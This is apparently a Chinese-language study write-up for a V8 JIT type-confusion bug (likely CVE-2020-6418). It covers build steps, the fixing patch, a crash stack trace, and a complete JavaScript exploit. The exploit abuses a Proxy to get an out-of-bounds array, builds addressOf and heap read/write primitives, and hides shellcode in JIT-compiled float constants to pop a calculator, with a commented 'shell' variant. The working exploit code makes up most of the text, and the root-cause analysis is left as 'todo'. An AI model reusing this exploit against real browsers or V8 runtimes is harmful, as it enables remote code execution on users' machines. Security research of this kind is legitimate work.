环境搭建
sudo apt install python
git reset --hard cecaa443ec29784ee26e31e678a333a3c1e71136
gclient sync -D
// 手动引入漏洞,参考下面的 patch,把相关修改注释掉即可
// debug version
tools/dev/v8gen.py x64.debug
ninja -C out.gn/x64.debug
// release debug
tools/dev/v8gen.py x64.release
ninja -C out.gn/x64.release
漏洞分析
patch 如下:
diff --git a/src/compiler/node-properties.cc b/src/compiler/node-properties.cc
index f43a348..ab4ced6 100644
--- a/src/compiler/node-properties.cc
+++ b/src/compiler/node-properties.cc
@@ -386,6 +386,7 @@
// We reached the allocation of the {receiver}.
return kNoReceiverMaps;
}
+ result = kUnreliableReceiverMaps; // JSCreate can have side-effect.
break;
}
case IrOpcode::kJSCreatePromise: {
漏洞利用
漏洞触发链
[#0] 0x5654ea4841d4 → v8::internal::compiler::NodeProperties::InferMapsUnsafe(v8::internal::compiler::JSHeapBroker*, v8::internal::compiler::Node*, v8::internal::compiler::Effect, v8::internal::ZoneUnorderedSet<v8::internal::compiler::MapRef, v8::internal::compiler::ObjectRef::Hash, v8::internal::compiler::ObjectRef::Equal>*)()
[#1] 0x5654ea424da7 → v8::internal::compiler::JSNativeContextSpecialization::InferMaps(v8::internal::compiler::Node*, v8::internal::compiler::Effect, v8::internal::ZoneVector<v8::internal::compiler::MapRef>*) const()
[#2] 0x5654ea425e4e → v8::internal::compiler::JSNativeContextSpecialization::ReduceElementAccess(v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::compiler::Node*, v8::internal::compiler::ElementAccessFeedback const&)()
[#3] 0x5654ea41e0b8 → v8::internal::compiler::JSNativeContextSpecialization::ReduceJSLoadProperty(v8::internal::compiler::Node*)()
[#4] 0x5654ea3924e9 → v8::internal::compiler::GraphReducer::Reduce(v8::internal::compiler::Node*)()
[#5] 0x5654ea39201a → v8::internal::compiler::GraphReducer::ReduceTop()()
[#6] 0x5654ea391c28 → v8::internal::compiler::GraphReducer::ReduceNode(v8::internal::compiler::Node*)()
[#7] 0x5654ea49c4b9 → v8::internal::compiler::InliningPhase::Run(v8::internal::compiler::PipelineData*, v8::internal::Zone*)()
[#8] 0x5654ea4904dd → auto v8::internal::compiler::PipelineImpl::Run<v8::internal::compiler::InliningPhase>()()
[#9] 0x5654ea48d8f2 → v8::internal::compiler::PipelineImpl::CreateGraph()()
todo
RCE
exp
如下:
const {log} = console;
let raw_buf = new ArrayBuffer(8);
let d_buf = new Float64Array(raw_buf);
let l_buf = new BigUint64Array(raw_buf);
let roots = new Array(0x30000);
let index = 0;
function major_gc() {
new ArrayBuffer(0x7fe00000);
}
function minor_gc() {
for (let i = 0; i < 8; i++) {
roots[index++] = new ArrayBuffer(0x200000);
}
roots[index++] = new ArrayBuffer(8);
}
let d2l = (val) => {
d_buf[0] = val;
return l_buf[0];
};
let l2d = (val) => {
l_buf[0] = val;
return d_buf[0];
};
let hexx = (str, val) => {
log(str+": 0x"+val.toString(16));
}
/*
function shellcode() {
return [
1.0,
1.9553825422107533e-246,
1.9560612558242147e-246,
1.9995714719542577e-246,
1.9533767332674093e-246,
2.6348604765229606e-284
];
}
*/
function shellcode() {
return [1.9553820986592714e-246, 1.9557677050669863e-246, 1.97118242283721e-246,
1.9563405961237867e-246, 1.9560656634566922e-246, 1.9711824228871598e-246,
1.986669612134628e-246, 1.9712777999056378e-246, 1.9570673233493564e-246,
1.9950498189626253e-246, 1.9711832653349477e-246, 1.9710251545829015e-246,
1.9562870598986932e-246, 1.9560284264452913e-246, 1.9473970328478236e-246,
1.9535181816562593e-246, 5.6124209215264576e-232, 5.438699428135179e-232];
}
//%PrepareFunctionForOptimization(shellcode);
//shellcode();
//%OptimizeFunctionOnNextCall(shellcode);
//shellcode();
for (let i = 0; i < 0x80000; i++) {
shellcode(); shellcode();
shellcode(); shellcode();
}
THRESHOLD = 0x8000
function f(p) {
a.push( // [5]
Reflect.construct(function(){}, arguments, p)?4.1835592388585281e-216:0 // [1]
); // itof(0x1337133700010000) = 4.1835592388585281e-216
}
let a;
let oob_arr;
let jitted = false
let p = new Proxy(Object, {
get: function() {
if (jitted) {
a[0] = {}; // [2] change `a` from `HOLEY_DOUBLE_ELEMENTS` to `HOLEY_ELEMENTS`
oob_arr = Array(1); // [3]
oob_arr[0] = 1.1; // [4]
}
return Object.prototype;
}
})
for (let i = 0; i <= THRESHOLD; i++) {
a = Array(8)
a[1] = 0.1
a.pop() // make a room such that push() does not reallocate elements
if (i == THRESHOLD) {
jitted = true;
}
f(p)
}
//hexx("oob_arr.length", oob_arr.length);
if (oob_arr.length < 2) {
throw "FAILED to trigger bug";
}
let addressOf_arr = [0x5f74, 0x5f74, oob_arr, oob_arr, oob_arr];
let addressOf_idx = -1;
for (let i = 0; i < 500; i++) {
// print(i+" => 0x"+d2l(oob_arr[i]).toString(16));
let val = d2l(oob_arr[i]);
if (val == 0xbee80000bee8n && d2l(oob_arr[i+1]) != 0n) {
addressOf_idx = i+1;
print(i+" => 0x"+d2l(oob_arr[addressOf_idx]).toString(16));
break;
}
}
function addressOf(obj) {
addressOf_arr[2] = obj;
return d2l(oob_arr[addressOf_idx]) & 0xffffffffn;
}
let oob_arr_addr = addressOf(oob_arr);
hexx("oob_arr_addr", oob_arr_addr);
let arb_rw_heap_arr = [1.1, 1.2, 1.5];
let arb_rw_heap_arr_addr = addressOf(arb_rw_heap_arr);
hexx("arb_rw_heap_arr_addr", arb_rw_heap_arr_addr);
let arb_rw_heap_idx = ((arb_rw_heap_arr_addr+8n) - (oob_arr_addr+3n*8n)) / 8n - 1n;
let orig_val = d2l(oob_arr[arb_rw_heap_idx]);// & 0xffffffffn;
hexx("arb_rw_heap_idx", arb_rw_heap_idx);
hexx("map|", orig_val);
//orig_val &= 0xffffffffn;
function arb_read_heap(offset) {
// let addr = ((offset-8n) << 32n) | orig_val;
let addr = 0x800000000n | (offset - 8n);
oob_arr[arb_rw_heap_idx] = l2d(addr);
return d2l(arb_rw_heap_arr[0]);
}
function arb_write_heap(offset, val) {
let addr = 0x800000000n | (offset - 8n);
oob_arr[arb_rw_heap_idx] = l2d(addr);
arb_rw_heap_arr[0] = l2d(val);
}
let shellcode_addr = addressOf(shellcode);
let code = arb_read_heap(shellcode_addr+0x18n) & 0xffffffffn;
let code_entry = arb_read_heap(code+0x10n);
hexx("shellcode_addr", shellcode_addr);
hexx("code", code);
hexx("code_entry", code_entry);
hexx("code_entry_ptr", arb_read_heap(code+0x8n));
//arb_write_heap(code+0x10n, code_entry+0x73n); // shell
arb_write_heap(code+0x10n, code_entry+0x66n); // calc
shellcode();
效果如下:
总结
仅仅把利用写了,漏洞成因后面分析
参考
https://starlabs.sg/blog/2022/12-deconstructing-and-exploiting-cve-2020-6418/
https://d0ublew.github.io/writeups/bi0s-2024/pwn/ezv8-revenge/index.html#tldr